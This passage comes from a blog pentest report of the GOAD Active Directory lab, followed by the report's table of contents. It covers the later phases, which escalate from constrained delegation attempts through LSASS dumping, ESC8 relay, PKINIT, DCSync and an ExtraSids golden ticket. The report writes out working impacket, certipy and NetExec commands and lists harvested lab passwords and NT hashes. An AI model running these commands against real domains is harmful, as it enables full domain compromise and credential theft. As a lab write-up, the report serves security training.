`NORTH\CASTELBLACK$` NT hash	`6bb93484ecd8a57205f74f6b2c870872`
`NORTH\CASTELBLACK$` AES256	`e8f8c78a66c706e60fe4e5fe1cdd38c8d0487099bd327d21ff5233107a6ecd60`
`NORTH\CASTELBLACK$` AES128	`847a5e0a855e707423d4fdbaea6185e6`
`NORTH\sql_svc` cached DCC2	`89e701ebbd305e4f5380c5150494584a`
`NORTH\sql_svc` plaintext	`YouWillNotKerboroast1ngMeeeeee`
`localuser`	`password`

9.2 S4U2Self + S4U2Proxy attempt toward WINTERFELL

Reasoning: With the AES256 key of CASTELBLACK$ we attempt the S4U2Self flow (obtain a service ticket on behalf of Administrator against CASTELBLACK$) followed by S4U2Proxy (convert it into a ticket for HTTP/winterfell.north.sevenkingdoms.local as Administrator), which would give us WinRM on WINTERFELL.

  
impacket-getST \
  -dc-ip 10.5.10.11 \
  -spn 'HTTP/winterfell.north.sevenkingdoms.local' \
  -impersonate 'Administrator' \
  -aesKey 'e8f8c78a66c706e60fe4e5fe1cdd38c8d0487099bd327d21ff5233107a6ecd60' \
  'north.sevenkingdoms.local/CASTELBLACK$'

Error: KDC_ERR_BADOPTION — Probably SPN is not allowed to delegate by user CASTELBLACK$ or initial TGT not forwardable

Analysis: Classic constrained delegation (via msDS-AllowedToDelegateTo) requires S4U2Self to generate a forwardable ticket for use in S4U2Proxy. This only occurs if the account has the TrustedToAuthForDelegation flag (0x1000000) set in its UAC, which enables protocol transition. CASTELBLACK$ has UAC 4096 (WORKSTATION_TRUST_ACCOUNT only), without that flag. The KDC issues S4U2Self as non-forwardable and rejects S4U2Proxy.

Status: Blocked. To unblock it, TrustedToAuthForDelegation would need to be added to CASTELBLACK$’s UAC in AD, which requires write privileges over that object — needs explicit approval per RoE.

9.3 Active session check on CASTELBLACK (LSASS)

Reasoning: If any Domain Admin has recently logged in to CASTELBLACK, their credentials might be cached in LSASS. The lsassy module combines creating an LSASS dump (via comsvcs.dll, ProcDump or other methods) with in-memory analysis to extract cleartext credentials or hashes.

  
nxc smb 10.5.10.22 -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local -M lsassy

Result: Only sql_svc:YouWillNotKerboroast1ngMeeeeee and CASTELBLACK\localuser:password — no DA with active session on CASTELBLACK at this time.

Accumulated Valid Credentials (current state — 2026-03-07)

User	Password / NT Hash	Domain	Source	Shell access
arya.stark	Needle	north.sevenkingdoms.local	SMB share (arya.txt)	—
samwell.tarly	Heartsbane	north.sevenkingdoms.local	LDAP description	—
jon.snow	iknownothing	north.sevenkingdoms.local	Kerberoasting	—
jeor.mormont	L0ngCl@w	north.sevenkingdoms.local	NETLOGON script.ps1	WinRM CASTELBLACK (Pwn3d!)
sql_svc	YouWillNotKerboroast1ngMeeeeee	north/essos	LSA Secret BRAAVOS	MSSQL CASTELBLACK + BRAAVOS
CASTELBLACK$	NT:`6bb93484ecd8a57205f74f6b2c870872` / AES256:`e8f8c78a66c706e60fe4e5fe1cdd38c8d0487099bd327d21ff5233107a6ecd60`	north.sevenkingdoms.local	LSA dump (jeor.mormont admin)	— (machine account)
tywin.lannister	powerkingftw135	sevenkingdoms.local	NETLOGON secret.ps1 (AES decrypt)	SMB THE-EYRIE
jaime.lannister	Kingslayer1!	sevenkingdoms.local	ForceChangePassword (tywin)	—
joffrey.baratheon	1killerlion	sevenkingdoms.local	Targeted Kerberoast (jaime)	—
tyron.lannister	Halfman1! / Halfman123	sevenkingdoms.local	WriteDacl (joffrey)	—
CASTELBLACK\localuser	password	LOCAL (CASTELBLACK)	LSA DefaultPassword	—
essos\Administrator	NT:`54296a48cd30259cc88095373cec24da`	essos.local	ADCS ESC1 + PKINIT	DCSync MEEREEN (Pwn3d!)
essos\krbtgt	NT:`a4d3a80b0f56194ee15d70c5cad86330`	essos.local	DCSync MEEREEN	Golden ticket ESSOS
essos\daenerys.targaryen	NT:`34534854d33b398b66684072224bb47a`	essos.local	DCSync MEEREEN	—
north\Administrator	NT:`dbd13e1c4e338284ac4e9874f7de6ef4`	north.sevenkingdoms.local	ESC8 relay WINTERFELL$ + PKINIT + DCSync	DCSync WINTERFELL (Pwn3d!)
north\krbtgt	NT:`757bb534955f0afd2cd07b01d72ab606`	north.sevenkingdoms.local	DCSync WINTERFELL	Golden ticket NORTH
WINTERFELL$	NT:`63685a768c0c63437d203964aa024ba4`	north.sevenkingdoms.local	ESC8 relay NTLM → SEVENKINGDOMS-CA	PKINIT DC machine account
sevenkingdoms\Administrator	NT:`c66d72021a2d4744409969a581a1705e`	sevenkingdoms.local	Inter-realm golden ticket (NORTH krbtgt + trust key ExtraSids) + NTDS dump	DCSync KINGSLANDING (Pwn3d!)
sevenkingdoms\krbtgt	NT:`3782992c5f73d84642ca7355618d259b`	sevenkingdoms.local	DCSync KINGSLANDING	Golden ticket SEVEN

Objective Status

Objective	Status
Domain Admin `north.sevenkingdoms.local`	Completed ✓ — ESC8 WINTERFELL$ cert → PKINIT → DCSync
Domain Admin `sevenkingdoms.local`	Completed ✓ — ExtraSids inter-realm golden ticket → NTDS dump
Compromise `essos.local`	Completed ✓ — ADCS ESC1 → PKINIT → DCSync
SYSTEM on CASTELBLACK	Completed ✓ — GodPotato via MSSQL xp_cmdshell

Phase 10 — Domain Admin All Domains (2026-03-09)

10.1 ESC8 Relay — WINTERFELL$ certificate via NTLM relay to SEVENKINGDOMS-CA

Technique: Coerced WINTERFELL$ (north.sevenkingdoms.local DC) via MS-EFSR using Coercer from Linux attacker machine. certipy-ad relay on 198.51.100.2:445 successfully relayed NTLM authentication to SEVENKINGDOMS-CA HTTP enrollment endpoint (ESC8 — Web Enrollment over HTTP). Obtained KerberosAuthentication template certificate for WINTERFELL$.

  
certipy-ad relay -target "http://10.5.10.10" -template 'KerberosAuthentication' \
  -interface 198.51.100.2 -forever
coercer coerce -l 198.51.100.2 -t 10.5.10.11 \
  -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local --always-continue

Result: winterfell$_north$_north.pfx — certificate for WINTERFELL$ with DNS SANs for north.sevenkingdoms.local

10.2 PKINIT — WINTERFELL$ machine account NT hash

  
certipy-ad auth -pfx 'winterfell$_north$_north.pfx' -dc-ip 10.5.10.11 \
  -domain north.sevenkingdoms.local -username 'winterfell$'
# WINTERFELL$ NT hash: 63685a768c0c63437d203964aa024ba4

10.3 DCSync north.sevenkingdoms.local

DC machine accounts have replication rights — WINTERFELL$ can DCSync its own domain.

  
impacket-secretsdump \
  -hashes aad3b435b51404eeaad3b435b51404ee:63685a768c0c63437d203964aa024ba4 \
  -just-dc-ntlm 'north.sevenkingdoms.local/WINTERFELL$@10.5.10.11'
# north\Administrator: dbd13e1c4e338284ac4e9874f7de6ef4
# north\krbtgt:        757bb534955f0afd2cd07b01d72ab606

10.4 ExtraSids — Inter-realm golden ticket for sevenkingdoms.local

Used inter-domain trust key (SEVENKINGDOMS$ in NORTH, trust account hash) to forge a referral TGT with ExtraSids SID for SEVEN Enterprise Admins (S-1-5-21-569288976-153438785-3228255649-519).

  
# Forge inter-realm TGT with NORTH krbtgt + trust account key
impacket-ticketer \
  -nthash f2e163e48e7bc75a94aaa1be71af80be \   # SEVENKINGDOMS$ trust key from NORTH DCSync
  -domain north.sevenkingdoms.local \
  -domain-sid S-1-5-21-1439377769-504837373-443698742 \
  -extra-sid S-1-5-21-569288976-153438785-3228255649-519 \
  -spn krbtgt/sevenkingdoms.local \
  Administrator

# Exchange for CIFS service ticket on KINGSLANDING
impacket-getST -k -no-pass -spn 'cifs/kingslanding.sevenkingdoms.local' \
  -dc-ip 10.5.10.10 'sevenkingdoms.local/Administrator'

# Dump SEVEN Administrator hash
nxc smb 10.5.10.10 -k --use-kcache --ntds --user 'sevenkingdoms\administrator'
# sevenkingdoms\Administrator: c66d72021a2d4744409969a581a1705e

10.5 DCSync sevenkingdoms.local

  
impacket-secretsdump \
  -hashes aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e \
  -just-dc-ntlm 'sevenkingdoms.local/Administrator@10.5.10.10'
# seven\krbtgt: 3782992c5f73d84642ca7355618d259b

windows, goad

pentest report

This post is licensed under CC BY 4.0 by the author.

GOAD (Game of Active Directory)

Phase 1 — Host Discovery

1.1 ICMP Sweep

Phase 2 — System Identification

2.1 NetExec SMB — Windows system and domain identification

2.2 Nmap — Full service and OS detection

10.5.10.10 — KINGSLANDING (DC sevenkingdoms.local)

10.5.10.11 — WINTERFELL (DC north.sevenkingdoms.local)

10.5.10.12 — MEEREEN (DC essos.local)

10.5.10.21 — THE-EYRIE (Member of sevenkingdoms.local)

10.5.10.22 — CASTELBLACK (Member of north.sevenkingdoms.local)

10.5.10.23 — BRAAVOS (Member of essos.local)

10.5.10.50 — ELK (OUT OF SCOPE)

10.5.10.51 — Wazuh (OUT OF SCOPE)

10.5.10.254 — Gateway

Phase 3 — Service and Access Enumeration

3.1 SMB — Anonymous and guest sessions

3.2 SMB — RID Brute (local account enumeration)

3.3 Web — HTTP/HTTPS application enumeration

3.4 LDAP — Directory enumeration

3.5 MSSQL — SQL instance enumeration

3.6 Kerberos — User enumeration and AS-REP Roasting

sevenkingdoms.local (DC: KINGSLANDING)

north.sevenkingdoms.local (DC: WINTERFELL)

essos.local (DC: MEEREEN)

Enumeration Summary

Identified architecture

Identified attack vectors (pending execution)

Confirmed domain users (25 total)

Scope — Pending confirmation

Technical References

Phase 4 — Authenticated Enumeration (arya.stark:Needle)

4.1 LDAP Users — north.sevenkingdoms.local (WINTERFELL)

4.2 LDAP Users — sevenkingdoms.local (KINGSLANDING, via trust)

4.3 LDAP Users — essos.local (MEEREEN, via trust)

4.4 Kerberoasting — north.sevenkingdoms.local

4.5 NETLOGON — Scripts with credentials

Accumulated Valid Credentials

Confirmed Shell Access

Phase 5 — ACL Exploitation (Attack Path A)

5.1 ForceChangePassword: tywin.lannister → jaime.lannister

5.2 Targeted Kerberoasting: jaime.lannister → joffrey.baratheon

5.3 WriteDacl abuse: joffrey.baratheon → tyron.lannister

5.4 ACL abuse chain summary

Phase 6 — Cross-Domain RBCD + BRAAVOS Compromise

6.1 RBCD Attack (Resource-Based Constrained Delegation)

6.2 Credentials obtained from BRAAVOS

6.3 Confirmed shell access on BRAAVOS

6.4 Lateral movement — sql_svc valid on CASTELBLACK

Accumulated Valid Credentials (updated)

Phase 7 — ADCS ESC1 → Domain Admin essos.local

7.1 ADCS enumeration with certipy

7.2 ESC1 exploitation — Certificate request as Administrator

7.3 DCSync — Full essos.local dump

7.4 Full attack chain toward essos.local DA

Phase 8 — BloodHound Enumeration (Full AD Graph)

8.1 BloodHound data collection

8.2 Key findings from the BloodHound graph

8.2.1 ACLs on protected groups (blocked by SDProp)

8.2.2 brandon.stark — Kerberos pre-authentication disabled (AS-REP Roastable)

8.2.3 Constrained delegation: CASTELBLACK$ → HTTP/winterfell

8.2.4 Unconstrained delegation: WINTERFELL$

Phase 9 — Attempted Domain Admin NORTH via Constrained Delegation

9.1 Obtaining the CASTELBLACK$ hash

9.2 S4U2Self + S4U2Proxy attempt toward WINTERFELL

9.3 Active session check on CASTELBLACK (LSASS)

Accumulated Valid Credentials (current state — 2026-03-07)

Objective Status

Phase 10 — Domain Admin All Domains (2026-03-09)

10.1 ESC8 Relay — WINTERFELL$ certificate via NTLM relay to SEVENKINGDOMS-CA

10.2 PKINIT — WINTERFELL$ machine account NT hash

10.3 DCSync north.sevenkingdoms.local

10.4 ExtraSids — Inter-realm golden ticket for sevenkingdoms.local

10.5 DCSync sevenkingdoms.local

Trending Tags